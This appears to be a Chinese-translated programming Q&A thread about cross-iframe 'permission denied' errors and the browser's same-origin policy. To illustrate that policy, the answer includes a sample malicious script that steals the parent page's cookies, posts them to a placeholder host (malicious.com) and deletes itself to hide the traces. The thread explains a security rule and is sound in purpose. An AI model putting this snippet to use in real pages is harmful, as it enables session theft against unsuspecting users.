拒绝访问属性的 javascript 权限

Question

我在从不同的 iframe 访问属性时遇到问题。我一直拒绝访问属性错误的权限。我见过有人问他们是否多次使用 file:///但从来没有人(除了我)使用过，所以永远不会得到解决。

我不会在网络上这样做。我所有帧的 src 都在我硬盘上的同一个文件中。我正在尝试从我在其他框架中创建的对象中获取一些属性

function fill_with_pairs()
{
    for (var x = 0 ; x < setLength ; x++)
    {
        var tempSet = sets[x];
        var tempNums = tempSet.wb_numbers;
        if (top.num_frame.active_list.active_nums[x].checked)
        {
            for (var y = 0 ; y < 4 ; y++)
            {
                var thesePairs = tempNums[y];
                var pairBase = numbersX[thesePairs];
                for (var z = y+1 ; z < 5 ; z++)
                {
                    var pairKey = tempNums[z];
                    pairBase[z]++;
                }
            }
        }
    }
}

Answer 1

下面的代码

<iframe src="http://example.com" onload="test(this)"></iframe>
<script>
function test(frame)
{
    var cDoc = frame.contentDocument;
}
</script>

throw

Unsafe JavaScript attempt to access frame with URL http://example.iana.org from frame with URL {your URL}. Domains, protocols and ports must match.

协议(protocol)必须匹配(例如:主窗口和 iframe 协议(protocol)必须是 file: 或 http: 来举几个例子)。

域必须匹配(例如:主窗口和 iframe 域必须是 example.com )

端口必须匹配(例如:主窗口和 iframe 端口必须是 80 或 8080)

---

这是为了保护用户免受从恶意网站执行的代码的侵害，如果这些边界没有到位，恶意网站很容易从毫无戒心的用户那里窃取数据。

恶意 JavaScript 代码示例:

<script id="loadScript">
window.onload = function()
{
    //grab parent to iframe
    var parentWindow = window.parent.window;
    //grab cookies from parent window
    var cookies = parentWindow.document.cookie;
    //send cookies off to malicious site
    var form = document.createElement("form");
    var inp = document.createElement("input");
    form.action="http://malicious.com/maliciousAd.php";
    form.method="post";
    inp.value=cookies;
    inp.name="cookies";
    form.appendChild(inp);
    form.submit();
    //remove traces of malicious code
    document.body.removeChild(document.getElementById("loadScript"))
}
</script>